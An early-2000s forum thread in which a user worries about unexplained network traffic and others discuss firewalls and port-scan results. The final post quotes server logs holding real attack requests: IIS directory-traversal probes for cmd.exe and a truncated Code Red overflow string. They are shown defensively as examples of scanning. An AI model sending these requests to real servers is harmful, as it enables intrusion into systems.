Randomly uploading/downloading moderately sized chunks of data

[fury]

From time to time (around every 10 or so minutes today) my computer just starts randomly accessing the internet. I can't manage to catch it in time to see any IPs on netstat -n but the thing definitely just randomly starts receiving around 10-20kb and sending 1-2kb, sometimes 3kb

I've been hacked. Thank you, Microsoft Windows!

I can't WAIT to get Windows XP. At least then I can probably protect myself from the millions and millions of security holes that infect my computer.

 

[Gonzo]

Do you have Update check or whatever it's called, from MS? or is IRC/ICQ/AIM/etc on? There are a thousand possibilities. I run ZA & it does that too. It's usually some benign background app running.

 

[fury]

Originally posted by Gonzo
Do you have Update check or whatever it's called, from MS? or is IRC/ICQ/AIM/etc on? There are a thousand possibilities. I run ZA & it does that too. It's usually some benign background app running.

Neither IRC nor AIM transfer that much data (I'm sure of IRC, but I don't know about AIM)

I don't run ZA

I run Genome@Home, Apache, MySQL and Outlook Express aside from AIM and mIRC. Genome@Home is on nonet (meaning I control when it uploads and downloads), Apache doesn't have any accesses from outside IPs since about 20 minutes after I woke up (I sent an IRC script to someone through it), MySQL doesn't send anything over the internet, and I have OE set to check for new mail every half hour.

 

[fury]

and no, I don't have the critical update notification installed

 

[Gonzo]

I didn't 'splain ZA properly. It tell me whenever an app accesses the net-if I've allowed it & whatever IS accessing at the moment. I get about 50-100 random hits a day & they're blocked.
example-
The firewall has blocked Internet access to your computer (Telnet) from 202.94.67.15 (TCP Port 37449) [TCP Flags: S].

Time: 9/27/01 1:49:56 PM.

It's frequently coming from my own ISP...
and yes, I know you probably knew that

check this out & see if you're particularlt vulnerable- https://grc.com/x/ne.dll?bh0bkyd2

 

[s4]

Windows XP is not your answer. There are a ton of services installed running in the background and some of them try to connect to the web. I have found Sygate Personal Firewall is more to my liking as a firewall and tells the ip of that a program that is trying to connect to. It's free and just as good as ZA.

A file call Svchost.exe in XP tries to connect to right off the bat when you connect to the web. Turns out it handles many other services on the machine. I don't run the beta of XP any more and went back to using Win ME.

 

[fury]

Your Internet port 139 does not appear to exist!
One or more ports on this system are operating in FULL STEALTH MODE! Standard Internet behavior requires port connection attempts to be answered with a success or refusal response. Therefore, only an attempt to connect to a nonexistent computer results in no response of either kind. But YOUR computer has DELIBERATELY CHOSEN NOT TO RESPOND (that's very cool!) which represents advanced computer and port stealthing capabilities. A machine configured in this fashion is well hardened to Internet NetBIOS attack and intrusion.
Unable to connect with NetBIOS to your computer.
All attempts to get any information from your computer have FAILED. (This is very uncommon for a Windows networking-based PC.) Relative to vulnerabilities from Windows networking, this computer appears to be VERY SECURE since it is NOT exposing ANY of its internal NetBIOS networking protocol over the Internet.
<hr>
21
FTP
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

23
Telnet
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

25
SMTP
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

79
Finger
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

80
HTTP
OPEN! The web is so insecure these days that new security "exploits" are being discovered almost daily. There are many known problems with Microsoft's Personal Web Server (PWS) and its Frontpage Extensions that many people run on their personal machines. So having port 80 "open" as it is here causes intruders to wonder how much information you might be willing to give away. (This is understandably open, as I run an Apache web server on my computer, but I have checked its access logs repeatedly, and no data has been sent to an outside IP since 11:04 AM)

110
POP3
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

113
IDENT
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

135
RPC
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

139
Net
BIOS
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

143
IMAP
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

443
HTTPS
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

445
MSFT-DS
Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!

 

[NEWMAN]

Server Logs

I get that on my server all the time, my ISP say that we have been all had. While running soome systems checks on my logs I got ...

202.45.37.205 - - [28/Sep/2001:02:45:20 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:21 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:23 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:24 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:25 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:27 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:28 -0700] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:29 -0700] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:30 -0700] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:31 -0700] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:33 -0700] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:34 -0700] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:35 -0700] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:36 -0700] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:37 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:39 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:37 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:39 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:41 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:43 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:46 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:48 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:51 -0700] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:54 -0700] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:57 -0700] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:01 -0700] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:04 -0700] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:07 -0700] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:11 -0700] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:15 -0700] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:18 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193

All prays on your IP numbers trying to get into your systems.
Oh and then theres the code red, and Blue thats running around the net looking for MS IIS Servers.

202.103.30.11 - - [28/Sep/2001:01:43:11 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090% HTTP/1.0" 302 0 0 "-" "-"
61.135.31.142 - - [28/Sep/2001:02:43:32 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090% HTTP/1.0" 302 0 0 "-" "-"

There fun too ...

It might be I have know Idea what I'm talking about, but hay, just though that i'd give you all my 2 cents